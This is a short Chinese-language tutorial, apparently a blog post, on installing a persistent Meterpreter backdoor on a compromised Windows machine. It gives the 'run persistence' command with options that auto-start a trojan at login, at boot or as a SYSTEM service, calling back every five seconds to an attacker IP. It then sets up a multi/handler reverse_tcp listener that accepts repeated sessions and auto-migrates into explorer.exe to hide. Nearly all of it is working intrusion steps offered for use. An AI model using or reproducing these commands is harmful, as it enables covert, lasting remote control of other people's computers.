meterpreter持久后门

meterpreter持久后门

背景：meterpreter好是好，但有个大问题，只要目标和本机连接断开一次后就再也连不上了，需要再次用exploit打才行！！！

解决方案：在与目标设备的meterpreter会话中创建一个持久后门(此后门将重新生成一个木马文件，并且该文件将周期性向服务端发送TCP请求)

具体步骤：

meterpreter > run persistence -U -i 5 -p 123 -r 192.168.1.71             =====>创建持久性后门
-A 自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用％TEMP％，则在目标主机中写入有效负载的位置。
-P 有效负载使用，默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动该木马（具有SYSTEM权限）
-T 要使用的备用可执行模板
-U 用户登录时自动启动该木马
-X 系统引导时自动启动该木马
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔（秒）
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP

此时就可以放心的断开与目标设备的session了，目标设备将周期性的向本机发送TCP请求，下次想连接此设备时只需做以下操作：

msfconsole

msf>use exploit/multi/handler       ====>“handler”这个模块专门就是来做被动监听的，诱使目标执行任何木马后都可以用这个模块进行连接。（假如目标设备运行的meterpreter/reverse_tcp这个木马，则在服务端handler也set这个木马为payload即可）
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.1.71
msf>set LPORT 123
msf>set exitonsession false          ===>这个如果不设置为false的话，只要建立了一个session后就不再继续监听，想要再连接其他session需要再次run。反之，如果设为false，建立了一个session后还会继续监听，无需run即可建立多个session。
msf>set AutoRunScript migrate -N explorer.exe          ===>一般模块都有AutoRunScript参数(需show advanced查看)，此参数作用是：建立连接后自动执行后面的命令，此处即“migrate -N explorer.exe”
msf>run